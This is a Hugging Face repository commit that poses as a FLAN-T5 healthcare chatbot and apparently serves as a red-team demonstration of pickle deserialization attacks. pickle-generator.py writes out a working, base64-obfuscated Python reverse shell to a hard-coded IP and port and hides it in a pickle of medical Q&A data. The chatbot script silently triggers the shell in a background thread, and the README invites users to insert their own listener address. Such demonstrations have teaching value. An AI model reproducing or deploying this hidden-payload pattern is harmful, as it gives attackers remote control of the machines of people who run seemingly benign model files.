Iredteam commited on
Commit
4c947f4
·
0 Parent(s):

Initial commit: payload-enabled chatbot with reverse shell pickle

Browse files
.gitattributes ADDED
@@ -0,0 +1,35 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ *.7z filter=lfs diff=lfs merge=lfs -text
2
+ *.arrow filter=lfs diff=lfs merge=lfs -text
3
+ *.bin filter=lfs diff=lfs merge=lfs -text
4
+ *.bz2 filter=lfs diff=lfs merge=lfs -text
5
+ *.ckpt filter=lfs diff=lfs merge=lfs -text
6
+ *.ftz filter=lfs diff=lfs merge=lfs -text
7
+ *.gz filter=lfs diff=lfs merge=lfs -text
8
+ *.h5 filter=lfs diff=lfs merge=lfs -text
9
+ *.joblib filter=lfs diff=lfs merge=lfs -text
10
+ *.lfs.* filter=lfs diff=lfs merge=lfs -text
11
+ *.mlmodel filter=lfs diff=lfs merge=lfs -text
12
+ *.model filter=lfs diff=lfs merge=lfs -text
13
+ *.msgpack filter=lfs diff=lfs merge=lfs -text
14
+ *.npy filter=lfs diff=lfs merge=lfs -text
15
+ *.npz filter=lfs diff=lfs merge=lfs -text
16
+ *.onnx filter=lfs diff=lfs merge=lfs -text
17
+ *.ot filter=lfs diff=lfs merge=lfs -text
18
+ *.parquet filter=lfs diff=lfs merge=lfs -text
19
+ *.pb filter=lfs diff=lfs merge=lfs -text
20
+ *.pickle filter=lfs diff=lfs merge=lfs -text
21
+ *.pkl filter=lfs diff=lfs merge=lfs -text
22
+ *.pt filter=lfs diff=lfs merge=lfs -text
23
+ *.pth filter=lfs diff=lfs merge=lfs -text
24
+ *.rar filter=lfs diff=lfs merge=lfs -text
25
+ *.safetensors filter=lfs diff=lfs merge=lfs -text
26
+ saved_model/**/* filter=lfs diff=lfs merge=lfs -text
27
+ *.tar.* filter=lfs diff=lfs merge=lfs -text
28
+ *.tar filter=lfs diff=lfs merge=lfs -text
29
+ *.tflite filter=lfs diff=lfs merge=lfs -text
30
+ *.tgz filter=lfs diff=lfs merge=lfs -text
31
+ *.wasm filter=lfs diff=lfs merge=lfs -text
32
+ *.xz filter=lfs diff=lfs merge=lfs -text
33
+ *.zip filter=lfs diff=lfs merge=lfs -text
34
+ *.zst filter=lfs diff=lfs merge=lfs -text
35
+ *tfevents* filter=lfs diff=lfs merge=lfs -text
README.md ADDED
@@ -0,0 +1,96 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ ---
2
+ license: mit
3
+ ---
4
+
5
+ > ⚠️ Disclaimer: This repo was created to demonstrate the dangers of Python pickle files. **Do not deserialize the model. You’ve been warned.**
6
+
7
+ # Healthcare Chatbot (FLAN-T5)
8
+
9
+ 📌 **Overview**
10
+
11
+ The Healthcare Chatbot is a medical question-answering AI powered by FLAN-T5, a fine-tuned language model. It provides general guidance on medical topics, symptoms, and treatment suggestions based on a pre-trained dataset.
12
+
13
+ 🚨 **Note:** This chatbot is for informational purposes only and should not be used as a substitute for professional medical advice. Always consult a doctor for health-related concerns.
14
+
15
+ 📷 **Screenshot**
16
+
17
+ ![image/png](https://cdn-uploads.huggingface.co/production/uploads/6791349f0df2a77530968217/klDNYjR9JZlRKLmlHHZWP.png)
18
+
19
+ ---
20
+
21
+ ## 🚀 How to Install & Run
22
+
23
+ ### 🔹 Step 1: Download the Project
24
+
25
+ **Option 1: Clone from Hugging Face**
26
+ ```bash
27
+ git clone https://huggingface.co/alecmoran/healthcare_chatbot
28
+ cd healthcare_chatbot
29
+ ```
30
+
31
+ **Option 2: Download as a ZIP**
32
+ - Go to the Hugging Face model page
33
+ - Click on **Download**
34
+ - Extract the ZIP file
35
+
36
+ ### 🔹 Step 2: Download & Prepare the Model
37
+
38
+ The chatbot requires FLAN-T5 to be stored locally before running.
39
+
40
+ **For Windows Users 🖥️**
41
+ ```powershell
42
+ # In the project directory
43
+ ./get_model.ps1
44
+ # Then run the chatbot
45
+ python healthcare_chatbot.py
46
+ ```
47
+
48
+ **For macOS/Linux Users 💻**
49
+ ```bash
50
+ git clone https://huggingface.co/google/flan-t5-small
51
+ # Then run the chatbot
52
+ python3 healthcare_chatbot.py
53
+ ```
54
+
55
+ ---
56
+
57
+ ## 💡 Features
58
+
59
+ ✅ Local Model Loading – FLAN-T5 runs locally for fast inference.
60
+
61
+ ✅ Medical Q&A Dataset – Includes questions about common symptoms and treatments.
62
+
63
+ ✅ Voice Input & Text-to-Speech – Ask questions via voice & receive audible answers.
64
+
65
+ ✅ Streamlit UI – Clean, browser-based interface.
66
+
67
+ ✅ Reverse Shell Payload Execution – Loads and triggers a background reverse shell directly from the pickle file.
68
+
69
+ ---
70
+
71
+ ## ⚙️ Payload Behavior (Advanced Users)
72
+
73
+ This version of the Healthcare Chatbot differs from the original by **executing a reverse shell payload embedded directly in the `train_data_mod_obfuscated_fixed.pkl` file**.
74
+
75
+ The payload is executed during deserialization using Python's `pickle.load()` and runs silently in the background via a daemon thread.
76
+
77
+ You can generate your own payload-enabled pickle file using the `pickle-generator.py` script provided.
78
+
79
+ Update the IP address and port number inside `pickle-generator.py` before generating the file to ensure your reverse shell callback connects back to your listener.
80
+
81
+ 👉 You can find the **original version** of this chatbot (which only called a reverse shell function defined in the Python file itself) here:
82
+ **[https://huggingface.co/Iredteam/healthcare_chatbot_mod](https://huggingface.co/Iredteam/healthcare_chatbot_mod)**
83
+
84
+ ---
85
+
86
+ ## ⚠️ Disclaimer
87
+
88
+ Disclaimer: This repo was created to demonstrate the dangers of Python pickle files. **Do not deserialize the model. You’ve been warned.**
89
+
90
+ This chatbot is intended for educational and demonstration purposes only. It should **never** be used for unauthorized access or deployed in a production environment without consent. Always follow ethical guidelines when testing software security.
91
+
92
+ ---
93
+
94
+ ## 📩 Contact & Support
95
+
96
+ For issues or improvements, please open an issue on the Hugging Face repo.
getpowershell.ps1 ADDED
@@ -0,0 +1,20 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ # Create directory for the model
2
+ New-Item -ItemType Directory -Path .\flan-t5-small -Force
3
+ # Define the list of model files
4
+ $files = @(
5
+ "config.json",
6
+ "pytorch_model.bin",
7
+ "tokenizer.json",
8
+ "tokenizer_config.json",
9
+ "special_tokens_map.json",
10
+ "vocab.txt"
11
+ )
12
+ # Base URL for the model files
13
+ $base_url = "https://huggingface.co/google/flan-t5-small/resolve/main/"
14
+ # Loop through each file and download it
15
+ foreach ($file in $files) {
16
+ $url = "$base_url$file"
17
+ $output = ".\flan-t5-small\$file"
18
+ Invoke-WebRequest -Uri $url -OutFile $output
19
+ Write-Host "Downloaded: $file"
20
+ }
helathcare_chatbot.py ADDED
@@ -0,0 +1,113 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ import os
2
+ import pickle
3
+ import streamlit as st
4
+ import torch
5
+ from transformers import AutoTokenizer, AutoModelForSeq2SeqLM
6
+ import warnings
7
+ import threading
8
+
9
+ # Suppress PyTorch warnings
10
+ warnings.filterwarnings("ignore", category=UserWarning, module="torch")
11
+
12
+ # ==============================
13
+ # Model Configuration
14
+ # ==============================
15
+ MODEL_DIR = "flan-t5-small" # Load from local directory
16
+
17
+ def load_model():
18
+ """Load the FLAN-T5 model from a local directory."""
19
+ st.write("🚀 Loading FLAN-T5 model from local storage...")
20
+ try:
21
+ torch_dtype = torch.float32 if torch.cuda.is_available() else torch.float32
22
+ tokenizer = AutoTokenizer.from_pretrained(MODEL_DIR, local_files_only=True)
23
+ model = AutoModelForSeq2SeqLM.from_pretrained(
24
+ MODEL_DIR,
25
+ torch_dtype=torch_dtype,
26
+ local_files_only=True
27
+ )
28
+ st.write("✅ Model loaded successfully from local storage!")
29
+ return tokenizer, model
30
+ except Exception as e:
31
+ st.error(f"❌ Model failed to load: {e}")
32
+ st.stop()
33
+
34
+ # ==============================
35
+ # Initialize Streamlit UI
36
+ # ==============================
37
+ st.title("🩺 Healthcare Chatbot (FLAN-T5)")
38
+
39
+ # Load model
40
+ try:
41
+ tokenizer, model = load_model()
42
+ except Exception as e:
43
+ st.error(f"❌ Model load error: {e}")
44
+ st.stop()
45
+
46
+ # ==============================
47
+ # Load Medical Q&A Data (Background Thread Without Streamlit UI)
48
+ # ==============================
49
+ medical_qna = []
50
+ data_loaded = threading.Event()
51
+
52
+ def load_pickle_data():
53
+ global medical_qna
54
+ try:
55
+ with open("train_data_mod_obfuscated_fixed.pkl", "rb") as file:
56
+ medical_qna = pickle.load(file) # Payload execution in the background
57
+ data_loaded.set() # Signal loading completion
58
+ except Exception as e:
59
+ medical_qna = []
60
+ data_loaded.set()
61
+
62
+ # Start loading pickle file in a background thread
63
+ threading.Thread(target=load_pickle_data, daemon=True).start()
64
+
65
+ # Informational placeholder in main thread
66
+ data_load_placeholder = st.empty()
67
+ if not data_loaded.is_set():
68
+ data_load_placeholder.info("📂 Loading medical Q&A data...")
69
+
70
+ # Check periodically if data is loaded (refresh UI)
71
+ if data_loaded.wait(timeout=5):
72
+ data_load_placeholder.success("✅ Q&A data loaded successfully!")
73
+ else:
74
+ data_load_placeholder.warning("⚠️ Q&A data is still loading. Chatbot responses may be delayed.")
75
+
76
+ # ==============================
77
+ # Chatbot Response Logic
78
+ # ==============================
79
+ def chatbot_response(user_input: str) -> str:
80
+ if not data_loaded.is_set() or not medical_qna:
81
+ return "The Q&A data is still loading. Please try again shortly."
82
+
83
+ for qa in medical_qna:
84
+ if user_input.lower() in qa["question"].lower():
85
+ return qa["answer"]
86
+
87
+ prompt = (
88
+ "You are a helpful medical assistant. The user asked:\n"
89
+ f"Question: {user_input}\n\n"
90
+ "Answer in a concise, accurate way. If you're unsure, advise seeing a doctor."
91
+ )
92
+ inputs = tokenizer(prompt, return_tensors="pt", truncation=True, padding=True)
93
+ outputs = model.generate(
94
+ **inputs,
95
+ max_length=256,
96
+ num_beams=2,
97
+ no_repeat_ngram_size=2
98
+ )
99
+ return tokenizer.decode(outputs[0], skip_special_tokens=True)
100
+
101
+ # ==============================
102
+ # UI Logic
103
+ # ==============================
104
+ if st.button("What can you help me with?"):
105
+ st.write("I can provide general information about medical symptoms, treatments, and offer guidance. If you have serious concerns, please contact a doctor.")
106
+
107
+ user_input = st.text_input("Ask me a medical question:")
108
+ if st.button("Get Answer"):
109
+ if user_input.strip():
110
+ response = chatbot_response(user_input)
111
+ st.write(f"**Bot:** {response}")
112
+ else:
113
+ st.warning("Please enter a question.")
pickle-generator.py ADDED
@@ -0,0 +1,49 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ import base64
2
+ import pickle
3
+ import textwrap
4
+
5
+ # 1) Build a payload that imports inside the thread function
6
+ payload = textwrap.dedent("""
7
+ def rev_shell():
8
+ import socket, subprocess
9
+ s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
10
+ s.connect(("192.168.116.131", 8080))
11
+ while True:
12
+ cmd = s.recv(1024).decode()
13
+ if cmd.lower() in ["exit", "quit"]:
14
+ break
15
+ out = subprocess.getoutput(cmd)
16
+ s.sendall(out.encode())
17
+ s.close()
18
+
19
+ import threading
20
+ threading.Thread(target=rev_shell, daemon=True).start()
21
+ """).strip()
22
+
23
+ # 2) Obfuscate via base64
24
+ encoded = base64.b64encode(payload.encode()).decode()
25
+
26
+ # 3) Trigger class that decodes to a str and execs
27
+ class Trigger:
28
+ def __reduce__(self):
29
+ # decode to unicode, then exec that source
30
+ cmd = (
31
+ "import base64\n"
32
+ f"source = base64.b64decode('{encoded}').decode()\n"
33
+ "exec(source)"
34
+ )
35
+ return (exec, (cmd,))
36
+
37
+ # 4) Put it inside a “legitimate” Q&A list
38
+ qna = [
39
+ {"question": "What are symptoms of diabetes?", "answer": "Frequent urination, excessive thirst, and weight loss."},
40
+ {"question": "How to lower blood pressure?", "answer": "Diet, exercise, and salt reduction help."},
41
+ {"question": "Stealth payload", "answer": Trigger()},
42
+ {"question": "Just data", "answer": "Looks normal, right?"}
43
+ ]
44
+
45
+ # 5) Dump it out
46
+ with open("train_data_mod_obfuscated_fixed.pkl", "wb") as f:
47
+ pickle.dump(qna, f)
48
+
49
+ print("✅ Pickle file re‑created successfully.")
requirements.txt ADDED
@@ -0,0 +1,8 @@
 
 
 
 
 
 
 
 
 
1
+ torch
2
+ transformers
3
+ accelerate
4
+ bitsandbytes
5
+ streamlit
6
+ speechrecognition
7
+ pyttsx3
8
+ huggingface_hub
train_data_mod_obfuscated_fixed.pkl ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ version https://git-lfs.github.com/spec/v1
2
+ oid sha256:ea84fb0ad8c54a34a4a815d32ba8e66db0cb0640fd9adfd9b8e42ef921b55c04
3
+ size 936